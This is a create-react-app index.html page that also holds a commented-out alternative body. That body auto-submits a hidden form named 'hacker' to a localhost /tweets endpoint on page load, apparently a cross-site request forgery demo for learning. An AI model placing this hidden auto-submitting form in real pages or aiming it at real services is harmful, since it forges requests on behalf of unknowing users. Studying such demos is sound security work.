<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
  <link rel="icon" href="%PUBLIC_URL%/favicon.ico" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="theme-color" content="#000000" />
  <meta name="description" content="Web site created using create-react-app" />

  <title>React App</title>
</head>

<body>
  <div id="root"></div>
</body>

<!-- <body onload="document.hacker.submit()">
  <div id="root"></div>

  <form action="http://localhost:4000/tweets" method="GET" name="hacker" target="hack"
    enctype="application/x-www-form-urlencoded">
    <input type="text" name="name" value="some value" />
  </form>
  <iframe name="hack"></iframe>
</body> -->

</html>